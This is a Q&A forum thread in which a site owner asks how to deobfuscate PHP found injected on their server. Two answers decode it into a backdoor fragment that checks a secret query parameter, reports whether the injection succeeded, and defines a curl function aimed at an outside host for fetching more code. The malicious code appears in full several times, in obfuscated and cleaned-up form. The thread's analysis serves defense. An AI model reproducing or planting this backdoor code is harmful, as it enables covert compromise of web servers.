How to deobfuscate a PHP code that is written as below?

Question

I have seen this code added to the server file. It looks like it is a malicious code, I can't seem a way to deobfuscate/decrypt this code.

<?php 
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9}; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

Answer 1

Because i always wonder what to expect if this would happen to me
i looked up what this code does.

First the commented code, and below the comments only.

DO NOT execute this on your machine!

// Sets header ...
@header('Content-Type:text/html;charset=utf-8');
// Disables error reporting (sure to not trigger notifications on owner side).
error_reporting(0);
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
//                                                                             ^ escaped by me
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
// Sets $O global (makes no sense to me).
global $O;
// decodes the url encoded string "qwertyuiopasdf...".
$O=urldecode($OOOOOO);
// $_GET['chen'] == '51-cn'
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    // Load this file into var.
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    // Explode by "<?php" (makes no sense to me).
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    // If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
        // then echo "[ok!]" and exit
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        // else echo "[fail!]" and exit
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}

// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)

// Set sub domain on var.
$oOooOO='z0807_1';
// Set url "http://z0807_1.agoods.top" on var.
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    // Init curl.
    #$ooooOOOooOo=curl_init();
    // Set url (given function param).
    #curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);
    // CURLOPT_RETURNTRANSFER = 1 to not echo out response.
    #curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);
    // 5 sec connection timeout.
    #curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);
    // Execute and set response to NEW var.
    #$oooooOOOOooO = curl_exec($ooooOOOooOo);
    #curl_close($ooooOOOooOo);
    // Return new var content.
    #return $oooooOOOOooO;
}

Here the "just comments" part.

// Sets header ...
// Disables error reporting (sure to not trigger notifications on owner side).
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// Sets $O global (makes no sense to me).
// decodes the url encoded string "qwertyuiopasdf...".
// $_GET['chen'] == '51-cn'
    // Load this file into var.
    // Explode by "<?php" (makes no sense to me).
    // If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
        // then echo "[ok!]" and exit
        // else echo "[fail!]" and exit

// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)

// Set sub domain on var.
// Set url "http://z0807_1.agoods.top" on var.
    // Init curl.
    // Set url (given function param).
    // CURLOPT_RETURNTRANSFER = 1 to not echo out response.
    // 5 sec connection timeout.
    // Execute and set response to NEW var.
    // Return new var content.

So this looks to me like

• not the complete code that got injected
• done by a bot that checks if the injection was successfully
• a script to load more bad code into your project on deamand.

Lets hope you just got "marked" somewhere as "found" - so nothing really happened yet.
But i dont know that.

Answer 2

You can unravel this step by step.

There is this $OOOOOO string which then URL-decoded into $O , which yields the following (which looks like going through the keyboard row by row):

$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,";

From then on, in many places characters of this string are accessed (using the lesser-known and by now also deprecated braces syntax for array index access) and used to build new strings. We can replace all these $O{x} bits with the actual characters (I used a regex replace):

if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "["."o"."k"."!"."]";
        exit;
    }else{
        echo "["."f"."a"."i"."l"."!"."]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

We can then combine those strings to make them more readable:

if($_GET["chen"]=="51-cn"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

Now let's rename the confusing variables:

if($_GET["chen"]=="51-cn"){
    $varA = file_get_contents(__FILE__);
    $varB = explode("<?php",$varA);
    if(strpos($varB[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$varC='z0807_1';
$varD="http://".$varC.".agoods.top"; 
function someFunction($varE){
    $varF=curl_init();
    curl_setopt ($varF, CURLOPT_URL, $varE);curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);$varG = curl_exec($varF);
    curl_close($varF);
    return $varG; 
}

Next, let's split up the long line inside of the function:

if($_GET["chen"]=="51-cn"){
    $varA = file_get_contents(__FILE__);
    $varB = explode("<?php",$varA);
    if(strpos($varB[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$varC='z0807_1';
$varD="http://".$varC.".agoods.top"; 
function someFunction($varE){
    $varF=curl_init();
    curl_setopt ($varF, CURLOPT_URL, $varE);
    curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);
    $varG = curl_exec($varF);
    curl_close($varF);
    return $varG; 
}